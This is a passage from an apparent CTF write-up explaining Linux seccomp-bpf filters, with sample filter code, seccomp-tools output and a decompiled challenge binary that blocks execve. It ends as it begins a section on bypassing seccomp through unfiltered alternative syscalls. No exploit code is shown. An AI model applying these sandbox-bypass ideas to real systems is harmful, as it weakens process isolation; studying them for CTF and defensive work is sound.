class=\"language-c\"><span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">,</span> SECCOMP_MODE_FILTER<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>prog<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_SECCOMP)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span>EXIT_FAILURE<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The <code class=\"language-text\">sock_fprog</code> struct passed as the argument is defined as follows:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">struct</span> <span class=\"token class-name\">sock_filter</span> filter<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> arch<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> AUDIT_ARCH_X86_64<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> nr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> __NR_getpid<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ERRNO <span class=\"token operator\">|</span> EPERM<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ALLOW<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">struct</span> <span class=\"token class-name\">sock_fprog</span> prog <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token punctuation\">.</span>len <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">short</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>filter<span class=\"token punctuation\">)</span> <span class=\"token operator\">/</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>filter<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">.</span>filter <span class=\"token operator\">=</span> filter<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>The <code class=\"language-text\">BPF_STMT</code> and <code class=\"language-text\">BPF_JUMP</code> macros in the filter definition each perform operations on the BPF program used by seccomp.</p>\n<p><code class=\"language-text\">BPF_STMT</code> is a macro for performing a specific operation.</p>\n<p>For example, the first <code class=\"language-text\">BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch))</code> and <code class=\"language-text\">BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0)</code> load the arch from <code class=\"language-text\">seccomp_data</code>, compare it with <code class=\"language-text\">AUDIT_ARCH_X86_64</code>, skip the next instruction if they match (jumping one ahead), and execute the immediately following instruction if they do not match.</p>\n<p>That immediately following instruction is <code class=\"language-text\">BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL)</code>, which returns <code class=\"language-text\">SECCOMP_RET_KILL</code> and terminates the process.</p>\n<p>So the first three instructions check whether the runtime architecture is <code class=\"language-text\">ARCH_X86_64</code>, and terminate the process if it is not.</p>\n<p>The subsequent instructions load the system call number from <code class=\"language-text\">seccomp_data.nr</code> via <code class=\"language-text\">BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr))</code>, compare it with <code class=\"language-text\">__NR_getpid</code>, block the system call via <code class=\"language-text\">BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM)</code> if they match, or allow it via <code class=\"language-text\">BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)</code> if they do not.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_LD <span class=\"token operator\">|</span> BPF_W <span class=\"token operator\">|</span> BPF_ABS<span class=\"token punctuation\">,</span> <span class=\"token function\">offsetof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">struct</span> <span class=\"token class-name\">seccomp_data</span><span class=\"token punctuation\">,</span> nr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_JUMP</span><span class=\"token punctuation\">(</span>BPF_JMP <span class=\"token operator\">|</span> BPF_JEQ <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> __NR_getpid<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ERRNO <span class=\"token operator\">|</span> EPERM<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"token function\">BPF_STMT</span><span class=\"token punctuation\">(</span>BPF_RET <span class=\"token operator\">|</span> BPF_K<span class=\"token punctuation\">,</span> SECCOMP_RET_ALLOW<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span></code></pre></div>\n<p>In summary, this filter registers a rule that blocks the <code class=\"language-text\">getpid</code> system call.</p>\n<p>Compiling and running this code confirms that <code class=\"language-text\">getpid</code> fails, just as in the previous example.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/248c419ecc339298dac06e88a707aeac/105d8/image-20240620000934533.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 80.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACR0lEQVQ4y5VUaZOaUBDEW1G5D1EQ8ABE0U2yyf//Z53pMSaVWt1KPrxCn0xPd0+PRt6E2F0jRJkH20/ghGs40QZenMKNUlheDD+MYNsWJpMJhsMhDMN4fdpzi7zYIoojhGGAVbKCH/hI0w1ObYPDcY9jdUCyTrBYLuA4DmzHxmw2xWAw+Ah46c6omwpFWUjxAVV1RFUfFYDP661T0CxLEa9iFEWOlTzni/lztt31gt1+h1gYEiTPt8I4xzbP9I7FqYCRuW3bmE6nn0u+XM7ItpmAlsqyriuV2DS1PmlHc6rlNDjJoS3L5VIarWBZ1kfAty83ZcRCekYLbm9Xlcrvt9sV3bVTW/gubSB71oRhiKW1FD9nfwBZTO+O4l0trGgBi8+XVhkRgAqiKFQ7drsSa7GG0sfjsfrY6/V0QOopuxLk+493tO3ptzzetecTSgGgHWxCC/jkXVHm6vkjCWRMzw1KK8U7Gp8kiXa/W5Aro81mrRL5TiKD4e/lL5au60qMbPi+jyAIMJUoGZRZySDYid3VgsMenudqNukPpTHU/X5f5VEa75/mkMGmTErsuot21ynLne97n0fk2bl71epUyY6M02yD/WGn2ZvP58rOnJvy2cRisYBpvmDHc5Yccjv2IpMBZxYpNQjuvjiug0Cyxy2hh3EcYzQavWZIVoyCJcsfPTZD9ngtw+AkmcFv71+xl2aMDsPMPwqG+6/8PQ4lcj8Jwqlx6U3T1ELeEZSN/tlD+rSRQk8GwLBygvRnPBnf91am+j9D+QlZVIvmBlO53gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/248c419ecc339298dac06e88a707aeac/8ac56/image-20240620000934533.webp 240w,\n/static/248c419ecc339298dac06e88a707aeac/d3be9/image-20240620000934533.webp 480w,\n/static/248c419ecc339298dac06e88a707aeac/e46b2/image-20240620000934533.webp 960w,\n/static/248c419ecc339298dac06e88a707aeac/446b5/image-20240620000934533.webp 1170w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/248c419ecc339298dac06e88a707aeac/8ff5a/image-20240620000934533.png 240w,\n/static/248c419ecc339298dac06e88a707aeac/e85cb/image-20240620000934533.png 480w,\n/static/248c419ecc339298dac06e88a707aeac/d9199/image-20240620000934533.png 960w,\n/static/248c419ecc339298dac06e88a707aeac/105d8/image-20240620000934533.png 1170w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/248c419ecc339298dac06e88a707aeac/d9199/image-20240620000934533.png\"\n            alt=\"image-20240620000934533\"\n            title=\"image-20240620000934533\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"using-seccomp-tools\" style=\"position:relative;\"><a href=\"#using-seccomp-tools\" aria-label=\"using seccomp tools permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using seccomp-tools</h3>\n<p>The details of seccomp-bpf controls like this can also be inspected using seccomp-tools.</p>\n<p>Reference: <a href=\"https://github.com/david942j/seccomp-tools\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">david942j/seccomp-tools: Provide powerful tools for seccomp analysis</a></p>\n<p>Running the program compiled in the previous section produces the following output:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 831px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/99733e6675ed593eeb5da056216f03c0/5b4a1/image-20240620001106792.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+klEQVQY022P2XKCQBBFAQ2LIrtBE4I4MzAY0WhWzf//18mEPMaHU93VXX3qtvXU58hjSVGFZPdr4uLBsGaRlYRpSRAVzJPl2PthRpTk5HlGUeSkWWpqQZzEJAbf97HEVtJstkipEKKhaWq0bum0YjYLmBuCwMOxLdy7CZOJg+P8YVnWfzpzLJXgcBzoe81+2HO5fnH5vlCuSoQUKLPf1BXLZUaaxkRRNCZ0Pfe2UIgtw2FPv9NoI70a2cfn+3hUVY/UokadFItkQTgPyc38ZrpfdN+hWmmEwyjcPe84nV94fTuzWq9oO/N+39IPGs/3mE6nuK6Lbds3hT/FpHwoxvUUcgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/99733e6675ed593eeb5da056216f03c0/8ac56/image-20240620001106792.webp 240w,\n/static/99733e6675ed593eeb5da056216f03c0/d3be9/image-20240620001106792.webp 480w,\n/static/99733e6675ed593eeb5da056216f03c0/6d405/image-20240620001106792.webp 831w\"\n              sizes=\"(max-width: 831px) 100vw, 831px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/99733e6675ed593eeb5da056216f03c0/8ff5a/image-20240620001106792.png 240w,\n/static/99733e6675ed593eeb5da056216f03c0/e85cb/image-20240620001106792.png 480w,\n/static/99733e6675ed593eeb5da056216f03c0/5b4a1/image-20240620001106792.png 831w\"\n            sizes=\"(max-width: 831px) 100vw, 831px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/99733e6675ed593eeb5da056216f03c0/5b4a1/image-20240620001106792.png\"\n            alt=\"image-20240620001106792\"\n            title=\"image-20240620001106792\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This confirms the architecture and system call number validation, and the blocking of <code class=\"language-text\">getpid</code> — exactly as we determined from the filter implementation.</p>\n<h3 id=\"checking-the-challenge-binarys-seccomp-filter\" style=\"position:relative;\"><a href=\"#checking-the-challenge-binarys-seccomp-filter\" aria-label=\"checking the challenge binarys seccomp filter permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Checking the Challenge Binary’s seccomp Filter</h3>\n<p>Now let’s check the seccomp filter in the challenge binary.</p>\n<p>From the decompilation, this program first executes the following <code class=\"language-text\">install_seccomp</code> function:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">void</span> <span class=\"token function\">install_seccomp</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> iVar1<span class=\"token punctuation\">;</span>\n  undefined2 local_18 <span class=\"token punctuation\">[</span><span class=\"token number\">4</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  undefined1 <span class=\"token operator\">*</span>local_10<span class=\"token punctuation\">;</span>\n  \n  local_18<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">8</span><span class=\"token punctuation\">;</span>\n  local_10 <span class=\"token operator\">=</span> filter<span class=\"token punctuation\">.</span><span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  iVar1 <span class=\"token operator\">=</span> <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x26</span><span class=\"token punctuation\">,</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>iVar1 <span class=\"token operator\">&lt;</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_NO_NEW_PRIVS)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  iVar1 <span class=\"token operator\">=</span> <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x16</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span>local_18<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>iVar1 <span class=\"token operator\">&lt;</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">perror</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"prctl(PR_SET_SECCOMP)\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p><code class=\"language-text\">PR_SET_NO_NEW_PRIVS</code> is <code class=\"language-text\">0x26</code> (33), so <code class=\"language-text\">prctl(0x26,1,0,0,0)</code> is equivalent to <code class=\"language-text\">prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)</code>.</p>\n<p>The following <code class=\"language-text\">prctl(0x16,2,local_18)</code> receives a <code class=\"language-text\">sock_fprog</code> placed on the stack and registers the seccomp-bpf filter.</p>\n<p>Since this filter is defined as a raw byte sequence, the decompiler’s default analysis did not decode it, but seccomp-tools makes it easy to inspect.</p>\n<p>Running seccomp-tools on the binary reveals that <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> are blocked:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 876px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b02edbebac3a05e00828345edc3b3306/1b1d5/image-20240620001242126.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 25.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA80lEQVQY022QzW6DMBAGkSrAsYHSkhgTGoP5MyihheTatH3/l/q68aGXchiNLFmzXnuyfIHuc1SDQprFyGSB59eDg8cpfCYQ7GJyhKeQI2Q7CCH+4IKDc44kScAYg1dXNUzdEAbWWhhTkTus6wek3COKBNI0AWehIwx8+L6PgOx53n/arkHTGnR9i/n9Qu7IM+5fnzjpE5RSqGqN821C2RfYywx5ntOww3bQjgMGO7jgZT7jcb7eVnz/3FG+HVEUCvIokS8KetEuPk7WrbsZNIZWbgzatqGLI72WPFqs14WCJTS98jGsnzoELHD/FMXRdoz4BUgFfCl8F7QqAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b02edbebac3a05e00828345edc3b3306/8ac56/image-20240620001242126.webp 240w,\n/static/b02edbebac3a05e00828345edc3b3306/d3be9/image-20240620001242126.webp 480w,\n/static/b02edbebac3a05e00828345edc3b3306/21dbd/image-20240620001242126.webp 876w\"\n              sizes=\"(max-width: 876px) 100vw, 876px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b02edbebac3a05e00828345edc3b3306/8ff5a/image-20240620001242126.png 240w,\n/static/b02edbebac3a05e00828345edc3b3306/e85cb/image-20240620001242126.png 480w,\n/static/b02edbebac3a05e00828345edc3b3306/1b1d5/image-20240620001242126.png 876w\"\n            sizes=\"(max-width: 876px) 100vw, 876px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b02edbebac3a05e00828345edc3b3306/1b1d5/image-20240620001242126.png\"\n            alt=\"image-20240620001242126\"\n            title=\"image-20240620001242126\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This means that executing <code class=\"language-text\">execve</code>, <code class=\"language-text\">execveat</code>, or any operation that depends on them (such as <code class=\"language-text\">system</code>) is not possible. We need to retrieve the Flag while working around this constraint.</p>\n<h2 id=\"bypassing-seccomp\" style=\"position:relative;\"><a href=\"#bypassing-seccomp\" aria-label=\"bypassing seccomp permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bypassing seccomp</h2>\n<p>To retrieve the Flag in this challenge, I want to understand seccomp bypass techniques as thoroughly as possible.</p>\n<h3 id=\"using-alternative-system-calls\" style=\"position:relative;\"><a href=\"#using-alternative-system-calls\" aria-label=\"using alternative system calls permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using Alternative System Calls</h3>\n<p>seccomp filtering can be implemented as either a blacklist or a whitelist.</p>\n<p>The blacklist approach explicitly specifies which system calls to block, as we have seen so far.</p>\n<p>The whitelist approach, on the other hand, can be implemented with code like the following, configuring the filter to allow only explicitly permitted system calls:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;seccomp.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">define</span> <span class=\"token macro-name\">BUF_SIZE</span>    <span class=\"token expression\"><span class=\"token number\">256</span></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">install_seccomp</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    scmp_filter_ctx ctx <span class=\"token operator\">=</span> <span class=\"token function\">seccomp_init</span><span class=\"token punctuation\">(</span>SCMP_ACT_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>exit_group<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>write<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token comment\">// seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0);</span>\n\n    <span class=\"token function\">seccomp_load</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">seccomp_release</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">install_seccomp</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token comment\">// Allowed</span>\n    <span class=\"token function\">write</span><span class=\"token punctuation\">(</span>STDOUT_FILENO<span class=\"token punctuation\">,</span> <span class=\"token string\">\"write is allowed.\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">18</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token comment\">// Disallowed</span>\n    <span class=\"token function\">getpid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>In particular, with a blacklist approach, using other unrestricted system calls to perform operations that were supposed to be blocked may allow you to bypass seccomp.</p>\n<p>For example, in the following writeup, <code class=\"language-text\">execve</code> was controlled by seccomp but <code class=\"language-text\">execveat</code> was not, which made exploitation possible:</p>\n<p>Reference: <a href=\"https://bitbucket.org/ptr-yudai/writeups/src/master/2019/ByteBandits_CTF_2019/lemonshell/\" target=\"_blank\" rel=\"nofollow noopener 